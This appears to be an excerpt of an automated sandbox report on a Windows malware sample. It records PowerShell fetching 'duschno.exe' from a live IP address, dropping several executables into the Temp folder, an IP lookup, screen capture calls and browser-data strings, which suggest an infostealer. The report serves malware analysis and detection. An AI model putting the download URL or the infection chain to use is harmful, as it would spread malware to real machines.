Source: global traffic	HTTP traffic detected: GET /duschno.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /duschno.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /duschno.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /duschno.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: api.ipify.org

Source: rundll32.exe, rundll32.exe, 00000005.00000002.1968612675.000000006FB72000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.1968045714.00000000052E1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1968045714.00000000052E6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1967873547.0000000005192000.00000020.00000001.01000000.00000003.sdmp, iviewers.dll	String found in binary or memory: http://147.45.47.15/duschno.exe
Source: powershell.exe, 00000006.00000002.1829359376.0000000007EB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.2156268378.00000220D9364000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1934681447.00000220D9351000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.2156186780.00000220D9360000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.2156155745.00000220D9360000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.microsoft.t/Regi
Source: powershell.exe, 00000006.00000002.1787640504.000000000542B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1795909432.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1816315013.00000000059FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.1770926466.0000000004AE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.1768364357.0000000004516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1772083324.0000000004957000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1768678311.00000000045D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1770926466.0000000004AE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000006.00000002.1768364357.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1772083324.000000000480E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1768678311.0000000004481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1770926466.0000000004991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1768364357.0000000004516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1772083324.0000000004957000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1768678311.00000000045D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1770926466.0000000004AE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000C.00000002.1770926466.0000000004AE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.1839889651.000000000813B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.9
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000006.00000002.1768364357.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1772083324.000000000480E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1768678311.0000000004481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1770926466.0000000004991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBfq
Source: t0ppkxxj.rwu.exe, 0000001A.00000002.2156752778.00000220D6AFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: t0ppkxxj.rwu.exe, 0000001A.00000002.2156752778.00000220D6AC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: t0ppkxxj.rwu.exe, 0000001A.00000002.2156752778.00000220D6AFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgMQ
Source: t0ppkxxj.rwu.exe, 0000001A.00000002.2156752778.00000220D6AFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgSQ
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1953933317.00000220D6B50000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1954013615.00000220D6B5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1953933317.00000220D6B50000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1954013615.00000220D6B5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1953933317.00000220D6B50000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1954013615.00000220D6B5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1953933317.00000220D6B50000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1954013615.00000220D6B5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 0000000C.00000002.1816315013.00000000059FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.1816315013.00000000059FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.1816315013.00000000059FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96BE000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96A6000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1936352684.00000220D96A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96BE000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96A6000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1936352684.00000220D96A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96BE000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96A6000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1936352684.00000220D96A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 0000000C.00000002.1770926466.0000000004AE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1956584573.00000220D6B83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.co
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1956584573.00000220D6B83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.coofiles
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1954013615.00000220D6B5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: powershell.exe, 00000006.00000002.1787640504.000000000542B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1795909432.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1816315013.00000000059FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1943138197.00000220D97AE000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1948618129.00000220D9A2F000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1943138197.00000220D97A6000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1942801541.00000220D89B8000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1946687678.00000220D89B0000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1943138197.00000220D96AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1944373961.00000220D97B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1944373961.00000220D97B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D9738000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1937880674.00000220D6B50000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D968B000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D96A7000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D9696000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D96C0000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D9713000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D9738000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1937880674.00000220D6B50000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D968B000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D96A7000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D9696000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D96C0000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1937294208.00000220D9713000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1953933317.00000220D6B50000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1954013615.00000220D6B5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1953933317.00000220D6B50000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1954013615.00000220D6B5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1936716683.00000220D96BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1943138197.00000220D97AE000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1948618129.00000220D9A2F000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1943138197.00000220D97A6000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1942801541.00000220D89B8000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1946687678.00000220D89B0000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1943138197.00000220D96AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1944373961.00000220D97B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1944373961.00000220D97B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1946687678.00000220D89BF000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1951921867.00000220DA0AA000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1944373961.00000220D97B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1944373961.00000220D97B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: t0ppkxxj.rwu.exe, 0000001A.00000003.1946687678.00000220D89BF000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1951921867.00000220DA0AA000.00000004.00000020.00020000.00000000.sdmp, t0ppkxxj.rwu.exe, 0000001A.00000003.1944373961.00000220D97B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49739 version: TLS 1.2

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF621895B70 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SHCreateMemStream,SelectObject,DeleteDC,ReleaseDC,DeleteObject,EnterCriticalSection,LeaveCriticalSection,IStream_Size,IStream_Reset,IStream_Read,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

26_2_00007FF621895B70

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\t0ppkxxj.rwu.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\ochicikt.z2z.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\5mg21dmq.1jt.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\inyligbs.qlq.exe	Jump to dropped file

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62189A430 RtlAcquirePebLock,NtAllocateVirtualMemory,lstrcpyW,lstrcatW,NtAllocateVirtualMemory,lstrcpyW,RtlInitUnicodeString,RtlInitUnicodeString,LdrEnumerateLoadedModules,RtlReleasePebLock,_invalid_parameter_noinfo_noreturn,CoInitializeEx,lstrcpyW,lstrcatW,CoGetObject,lstrcpyW,lstrcatW,CoGetObject,CoUninitialize,	26_2_00007FF62189A430
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621899D30 GetModuleHandleA,GetProcAddress,OpenProcess,NtQuerySystemInformation,NtQuerySystemInformation,GetCurrentProcess,NtQueryObject,GetFinalPathNameByHandleA,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	26_2_00007FF621899D30
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: 27_2_00007FF741AC9D30 GetModuleHandleA,GetProcAddress,OpenProcess,NtQuerySystemInformation,NtQuerySystemInformation,GetCurrentProcess,NtQueryObject,GetFinalPathNameByHandleA,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	27_2_00007FF741AC9D30
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: 28_2_00007FF7CEEE9D30 GetModuleHandleA,GetProcAddress,OpenProcess,NtQuerySystemInformation,NtQuerySystemInformation,GetCurrentProcess,NtQueryObject,GetFinalPathNameByHandleA,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	28_2_00007FF7CEEE9D30
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: 29_2_00007FF786AA9D30 GetModuleHandleA,GetProcAddress,OpenProcess,NtQuerySystemInformation,NtQuerySystemInformation,GetCurrentProcess,NtQueryObject,GetFinalPathNameByHandleA,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	29_2_00007FF786AA9D30

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_0435B4A0	6_2_0435B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_0435B490	6_2_0435B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_043552F0	6_2_043552F0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621855310	26_2_00007FF621855310
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621898330	26_2_00007FF621898330
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621895240	26_2_00007FF621895240
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218A918C	26_2_00007FF6218A918C
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621840450	26_2_00007FF621840450
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621876350	26_2_00007FF621876350
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62183F730	26_2_00007FF62183F730
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218D0658	26_2_00007FF6218D0658
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218976A0	26_2_00007FF6218976A0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62189C5CB	26_2_00007FF62189C5CB
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62184E610	26_2_00007FF62184E610
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62184D570	26_2_00007FF62184D570
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218CB5B0	26_2_00007FF6218CB5B0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621896860	26_2_00007FF621896860
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62184CA10	26_2_00007FF62184CA10
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621875970	26_2_00007FF621875970
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62184ECB0	26_2_00007FF62184ECB0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621842CA0	26_2_00007FF621842CA0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621895B70	26_2_00007FF621895B70
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621844B70	26_2_00007FF621844B70
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621841B90	26_2_00007FF621841B90
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218B2E3C	26_2_00007FF6218B2E3C
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62183FE20	26_2_00007FF62183FE20
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62189D050	26_2_00007FF62189D050
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62187D080	26_2_00007FF62187D080
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218420B0	26_2_00007FF6218420B0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62188F020	26_2_00007FF62188F020
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621859F80	26_2_00007FF621859F80
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218802C0	26_2_00007FF6218802C0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62188E2F0	26_2_00007FF62188E2F0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218B71D8	26_2_00007FF6218B71D8
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218A1220	26_2_00007FF6218A1220
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218A3150	26_2_00007FF6218A3150
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218C7160	26_2_00007FF6218C7160
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218A6164	26_2_00007FF6218A6164
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621816180	26_2_00007FF621816180
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218B14E4	26_2_00007FF6218B14E4
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621836510	26_2_00007FF621836510
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621835520	26_2_00007FF621835520
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218BA44F	26_2_00007FF6218BA44F
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62186B480	26_2_00007FF62186B480
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218383D0	26_2_00007FF6218383D0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218BA3C8	26_2_00007FF6218BA3C8
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62189A430	26_2_00007FF62189A430
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62188B420	26_2_00007FF62188B420
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62186C420	26_2_00007FF62186C420
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218A5394	26_2_00007FF6218A5394
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218B46E4	26_2_00007FF6218B46E4
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621864720	26_2_00007FF621864720
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218B8674	26_2_00007FF6218B8674
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218A666C	26_2_00007FF6218A666C
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218B36A8	26_2_00007FF6218B36A8
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621816610	26_2_00007FF621816610
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621896540	26_2_00007FF621896540
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218A5598	26_2_00007FF6218A5598
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218498CD	26_2_00007FF6218498CD
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62188C8E0	26_2_00007FF62188C8E0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218AA924	26_2_00007FF6218AA924
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218AF7E6	26_2_00007FF6218AF7E6
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621872750	26_2_00007FF621872750
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62189A780	26_2_00007FF62189A780
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF62186B780	26_2_00007FF62186B780
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF6218A579C	26_2_00007FF6218A579C
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621870AC0	26_2_00007FF621870AC0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621861AF0	26_2_00007FF621861AF0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: 26_2_00007FF621888B00	26_2_00007FF621888B00
